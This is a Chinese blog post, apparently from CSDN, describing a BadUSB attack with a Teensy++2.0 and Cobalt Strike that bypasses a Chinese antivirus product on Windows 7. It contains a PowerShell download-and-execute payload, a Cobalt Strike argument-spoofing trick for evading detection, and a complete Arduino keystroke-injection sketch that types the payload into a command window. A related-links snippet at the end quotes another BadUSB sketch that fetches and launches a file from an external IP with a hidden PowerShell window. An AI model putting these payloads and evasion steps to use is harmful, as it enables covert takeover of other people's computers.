BadUSB利用以及免杀(测试bypass某数字卫士)

最新推荐文章于 2024-09-02 20:37:59 发布
最新推荐文章于 2024-09-02 20:37:59 发布
阅读量1.1k 收藏 9
点赞数 1
分类专栏: BadUSB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/r250414958/article/details/114333023
版权

文章写了有一段时间了,本来打算投稿某网站的,但发现太菜了,索性算了

本文章仅供个人研究之用,不得用于非法用途,否则后果自负

系统:windows_7_64_专业版
工具:cobalt strike3.14、Teensy++2.0

关于利用方面

我首先就想到了powershell,但是网上的免杀方法已经被杀得七七八八了

但是天无绝人之路,再继续搜索下看到了白色键盘师傅的文章,经过测试可绕过文章发布最新的某数字卫士上线

https://www.temp33.com/bypass%E7%B3%BB%E5%88%97-%E7%BB%95%E8%BF%87360%E6%97%A0%E6%96%87%E4%BB%B6powershell%E4%B8%8A%E7%BA%BF/

在cobalt strike3.14生成powershell payload
在这里插入图片描述
Payload:

cmd /c echo IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:80/payload.ps1')) | powershell -

在这里插入图片描述
在这里插入图片描述
到这一步,继续测试还有个问题,就是虽然成功上线了,但是在执行命令的时候却被杀了

在这里插入图片描述
于是再次寻找方法,看到了师傅们早就研究过这个问题了,于是使用了ANONYMOUS师傅的使用
obalt strike的argue参数污染

argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

再运行argue,检查污染结果:
在这里插入图片描述
接下来就是复现师傅们的研究成果
execute执行powershell.exe(shell命令不会成功,因为shell本质是cmd.exe /c arguments)
在这里插入图片描述

在这里插入图片描述
执行成功!

开始正式测试

Powershell免杀测试进行到这里就初步完成了,接下来要结合Teensy++2.0来进行测试
把之前的 Hello,Teensy,拿来改一下,先不考虑隐藏

#include "Keyboard.h"

/* Init function */
void setup()
{
// Begining the Keyboard stream
Keyboard.begin();

// Wait 500ms
delay(500);
delay(3000);

Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
  
delay(500);
Keyboard.print("cmd");
delay(1000);
Keyboard.press(KEY_RETURN);
delay(50);
Keyboard.release(KEY_RETURN);

delay(1000);
Keyboard.print("cmd /c echo IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:80/payload.ps1')) | powershell -");
Keyboard.press(KEY_RETURN);
delay(50);
Keyboard.release(KEY_RETURN);
delay(700);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
Keyboard.releaseAll();
// Ending stream
Keyboard.end();
}
  /* Unused endless loop */
void loop() {}

按照之前的制作基础编译,烧录进去
然后开始测试,这是在我机器上的例子
在这里插入图片描述
在这里插入图片描述
测试成功

关于BadUSB的隐藏

我看了网上的一些例子,感觉都不是特别理想,等再多收集一点例子时候再写一篇总结一下

参考的文章:

http://www.0x3.biz/archives/837.html

https://github.com/X1r0z/exp10it/issues/65

QQQqQqqqqrrrr
关注
专栏目录
BadUSB简单免杀一秒上线CobaltStrike.pdf
03-24
BadUSB简单免杀一秒上线CobaltStrike.pdf
BadUSB测试记录
weixin_34223655的博客
09-07 347
0x00 前言 不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。 0x01参考资料 https://github.com/adamcaudill/Psychsonhttps://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloadshttp://zone...
木马免杀处理
最新发布
weixin_58666006的博客
09-02 996
木马免杀,脚本型木马和二进制型木马
Badusb原理及制作并简单免杀实现远控教程
热门推荐
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
简易BadUSB,攻击效果不简单
02-09 1967
不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知…… 也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。 一、前期准备 Arduino: 这里使用的是BS Micro pro micro l...
u盘插在电脑上没有反应_插一个U盘黑一台电脑Badusb最详细制作教程
weixin_39999536的博客
11-06 1071
文章来源:重生信息安全文章作者:J0o1ey0x001-简介概述在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态2.Badusb内部结构从这张图便可以了解到--Badusb和普通的U盘并没有什么两...
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
【标题】"new.bypass_bypass_NEW_免杀_webshell_phpwebshell_" 指的是一种新型的Webshell,它带有“bypass”和“NEW”特性,表明这是一个旨在绕过安全检测,且是最新技术的PHP Webshell。Webshell通常被黑客用于远程...
bypass_360_meterpreter免杀技巧1
08-03
本文将探讨一种针对360安全卫士的Meterpreter免杀技巧,利用PHP转换为可执行文件(EXE)的方式,来规避杀毒软件的检测。该方法的核心是通过MSFvenom生成PHP payload,再使用Bambalam PHP EXE Compiler将其转换为...
Tide安全团队免杀绕过教程
11-12
在这个教程中,Tide安全团队分享了他们的专业知识,专注于如何在网络安全领域中实现免杀(Evasion)和绕过(Bypassing Anti-Virus,简称Bypass AV)的技术。免杀技术是黑客或渗透测试人员在进行测试时,为避免被反...
Windows defender bypass免杀
jijisaq的博客
06-14 643
在制作免杀的过程中,翻找 Windows 官方对 Windows Defender 的介绍,发现有这样一个目录:Configure Microsoft Defender Antivirus exclusions on Windows Server(在 Windows server 中配置defender排除项)。简而言之就是在 Windows Server2016 和 2019 中,Windows Defender 默认存在一些排除项,在实时检测过程中会忽略这些排除项,但是主动扫描的时候不会排除。
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1458
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
BadUSB实现后台静默执行上线CobaltStrike.pdf
03-24
BadUSB实现后台静默执行上线CobaltStrike.pdf
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
BadUSB攻击
qq_45391176的博客
09-08 2329
一文读懂Bad USB
micropython移植后不识别usb_【micropython】用python来进行BadUSBUSB-HID测试(含无线控制)...
weixin_39932762的博客
12-05 235
本文以TPYBoardv102开发板为例讲解了利用micropython进行BadUSBusb-HID设备测试的主要方法,使用mt7681模块进行了一个简单的实验,实现了手机摇控键盘输入的测试。最近从 网上搞了一块tpyboard V102(官网www.micropython.net.cn)进行了一下研究,特别是对其自身的USB-HID功能进行了测试,令人惊喜的是,你可以在仅懂python的情况...
java u盘检测工具,BadUSB测试记录
weixin_30489285的博客
03-20 251
0x00 前言不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。0x01参考资料0x02环境搭建1、硬件U盘 :东芝(TOSHIBA) 速闪系列 U盘 16GB (黑色) USB3.0主控版本:Phison2251-032、软件Windows x64主机(1)Java Runtime Environment :Java环境,用于支持Duckencoder(2)...
badusb示例代码可绕过360
OKAY_TC的博客
10-16 3225
绕过360版本代码: void setup() { // putpower shell your setup code here, to run once Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//...
IOT黑客入门篇之初探Badusb
网安君的博客
11-14 2879
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击。例如,USB 闪存驱动器可以包含可编程的Intel 8051微控制器,该微控制器可以重新编程,将USB闪存驱动器变成恶意设备。BadUSB 攻击是在 2014 年由Karsten Nohl、Sascha Krißler和Jakob Lell在一次Black Hat演讲中首次披露的。演讲两个月后,其他研究人员发布了可用于利用该漏洞的代码。2017年,USG加密狗1.0版本发布,其作用类似于硬件防火墙,旨在防止BadUSB风格的攻击。
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 2663
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
黑客免杀技术解析与反制策略
高级篇(第7至16章)深入到PE文件格式的细节,详细解析了MS-DOS头、PE文件头、区段表等关键组成部分,以及如何利用这些知识在免杀中实施更高级的技巧,如壳的修改和应用,以及如何对抗启发式扫描。这一部分还涵盖了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值